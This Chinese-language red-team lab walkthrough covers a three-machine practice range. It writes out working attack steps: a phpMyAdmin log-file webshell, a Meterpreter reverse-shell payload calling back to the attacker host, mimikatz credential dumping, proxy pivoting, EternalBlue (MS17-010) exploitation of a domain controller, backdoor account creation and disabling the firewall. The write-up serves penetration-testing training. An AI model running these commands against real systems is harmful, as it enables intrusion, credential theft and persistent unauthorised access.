ATT&CK实战系列——红队实战(一) 教学文档

1. 靶场概述

本靶场是红日安全团队推出的红队实战系列，模拟真实企业环境搭建，采用ATT&CK攻击链路构建完整闭环。靶场包含三台虚拟机：

• VM1 (Win7): Web服务器
• VM2 (Windows 2003): 域成员服务器
• VM3 (Windows Server 2008): 域控制器

2. 环境搭建

2.1 网络配置

1. Win7配置:

   • 主适配器: VMnet1(仅主机模式)
   • 添加第二适配器: NAT模式

2. Windows 2003/2008配置:

   • 仅VMnet1(仅主机模式)

3. Kali攻击机:

   • NAT模式

2.2 IP地址分配

• Kali: 192.168.2.129
• Win7:
  • 外网: 192.168.2.133
  • 内网: 193.168.52.143
• Windows 2003: 192.168.52.141
• Windows Server 2008: 192.168.52.138

3. 外网渗透

3.1 信息收集

1. 使用nmap扫描发现Win7 IP(192.168.2.133)
2. 发现开放80端口，运行php探针
3. 网站根目录: C:/phpStudy/WWW
4. 发现phpmyadmin目录

3.2 通过phpmyadmin获取Webshell

1. 使用默认凭证(root/root)登录phpmyadmin
2. 绕过secure_file_priv限制:

   SET GLOBAL general_log = 'ON';
   SET GLOBAL general_log_file = 'C:/phpStudy/WWW/shell.php';
   SELECT '<?php eval($_POST["cmd"]);?>';
   

3. 使用中国菜刀连接webshell

3.3 内网信息收集

1. 执行命令收集信息:

   whoami
   ipconfig
   net config Workstation
   net localgroup administrators
   systeminfo
   

2. 发现内网网段: 192.168.52.x
3. 确认域信息: god.org，域服务器名称为OWA

3.4 反弹Shell

1. 使用msfvenom生成payload:

   msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.129 LPORT=4444 -f exe -o msf.exe
   

2. 设置监听:

   use exploit/multi/handler
   set payload windows/meterpreter/reverse_tcp
   set lhost 192.168.2.129
   set lport 4444
   run
   

3. 在Win7上执行msf.exe获取meterpreter会话
4. 提权至system权限:

   getuid
   getsystem
   

3.5 开启RDP

1. 执行命令开启3389端口:

   run post/windows/manage/enable_rdp
   

2. 使用rdesktop连接:

   rdesktop 192.168.2.133
   

3.6 密码抓取

1. 加载mimikatz模块:

   load mimikatz
   

2. 获取密码hash和明文:

   creds_msv
   creds_kerberos
   

4. 内网渗透

4.1 内网信息收集

1. 查看安装软件:

   run post/windows/gather/enum_applications
   

2. 查看ARP表:

   arp -a
   

4.2 路由配置

1. 添加路由:

   run autoroute -s 192.168.52.0/24
   run autoroute -p
   

2. 设置SOCKS代理:

   use auxiliary/server/socks4a
   set srvhost 192.168.2.129
   set srvport 1080
   run
   

3. 配置proxychains:

   vim /etc/proxychains.conf
   # 修改为: socks4 192.168.2.129 1080
   

4.3 端口扫描

1. 使用MSF模块扫描:

   use auxiliary/scanner/portscan/tcp
   set rhosts 192.168.52.141
   set threads 100
   run
   

2. 发现两台主机均开放135、445端口

5. 攻击域成员(Windows 2003)

5.1 系统识别

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.52.141
run

5.2 永恒之蓝漏洞利用

1. 漏洞验证:

   use auxiliary/scanner/smb/smb_ms17_010
   set rhost 192.168.52.141
   run
   

2. 执行命令:

   use auxiliary/admin/smb/ms17_010_command
   set rhosts 192.168.52.141
   set command whoami
   run
   

3. 添加用户:

   set command "net user blckder02 8888! /add"
   set command "net localgroup administrators blckder02 /add"
   

4. 开启RDP:

   set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
   

5. 连接RDP:

   proxychains rdesktop 192.168.52.141
   

5.3 获取Meterpreter会话

use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set rhosts 192.168.52.141
run

6. 攻击域控(Windows Server 2008)

6.1 系统识别

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.52.138
run

6.2 永恒之蓝漏洞利用

1. 执行命令:

   use auxiliary/admin/smb/ms17_010_command
   set rhosts 192.168.52.138
   

2. 关闭防火墙:

   set command "netsh firewall set opmode mode=disable"
   

3. 开启RDP:

   set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
   

4. 使用之前获取的域管理员凭证登录

6.3 获取Meterpreter会话

use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set rhosts 192.168.52.138
run

7. 攻击链总结

1. 初始访问: 通过phpmyadmin弱口令获取Webshell
2. 权限提升: 获取meterpreter会话并提权至system
3. 凭证访问: 使用mimikatz抓取密码
4. 发现内网: 通过ARP表和网络配置发现内网
5. 横向移动: 利用MS17-010漏洞攻击域成员和域控
6. 持久化: 添加用户并开启RDP服务

8. 关键点总结

1. phpmyadmin日志写shell: 绕过secure_file_priv限制的有效方法
2. Meterpreter使用: 反弹shell、提权、开启RDP的标准流程
3. 内网路由配置: autoroute和socks代理的配合使用
4. 永恒之蓝利用: 多种利用方式(command执行和psexec反弹shell)
5. Windows防火墙绕过: 通过命令关闭防火墙确保RDP连接成功